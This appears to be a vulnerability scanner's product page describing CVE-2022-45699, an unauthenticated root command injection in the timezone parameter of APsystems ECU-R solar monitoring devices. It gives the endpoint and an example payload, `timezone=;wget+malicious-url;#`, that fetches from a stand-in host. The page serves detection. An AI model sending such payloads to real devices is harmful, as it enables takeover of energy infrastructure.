CVE-2022-45699 Scanner

CVE-2022-45699 Scanner – Detects command injection via timezone parameter in APsystems ECU-R v5203

Short Info


Level

Critical

Single Scan

Single Scan

Can be used by

Asset Owner

Estimated Time

10 seconds

Time Interval

8 days 6 hours

Scan only one

Domain, Subdomain, IPv4

Toolbox

-

APsystems ECU-R is an energy monitoring and communication device used in photovoltaic (solar power) systems. It manages and communicates with microinverters to monitor system performance. These devices are typically exposed on local or remote networks for administrative access.

This scanner targets a critical remote command injection vulnerability (CVE-2022-45699) present in ECU-R firmware version 5203. The flaw resides in the administration web interface, specifically the `/index.php/management/set_timezone` endpoint. The `timezone` parameter is improperly sanitized, allowing remote, unauthenticated attackers to inject and execute arbitrary system commands as **root**.

Exploitation involves sending a crafted POST request with a payload injected into the `timezone` field (e.g., `timezone=;wget+malicious-url;#`). This payload is directly interpreted by the system shell, leading to full remote code execution. The scanner confirms exploitation via [interactsh](https://github.com/projectdiscovery/interactsh) integration by checking for out-of-band HTTP interactions.

Successful exploitation can result in full device compromise, including modification of configurations, installation of backdoors, and pivoting within the local network. Because the device is often deployed in critical energy infrastructure, this vulnerability poses a significant security risk.

REFERENCES

Get started to protecting your digital assets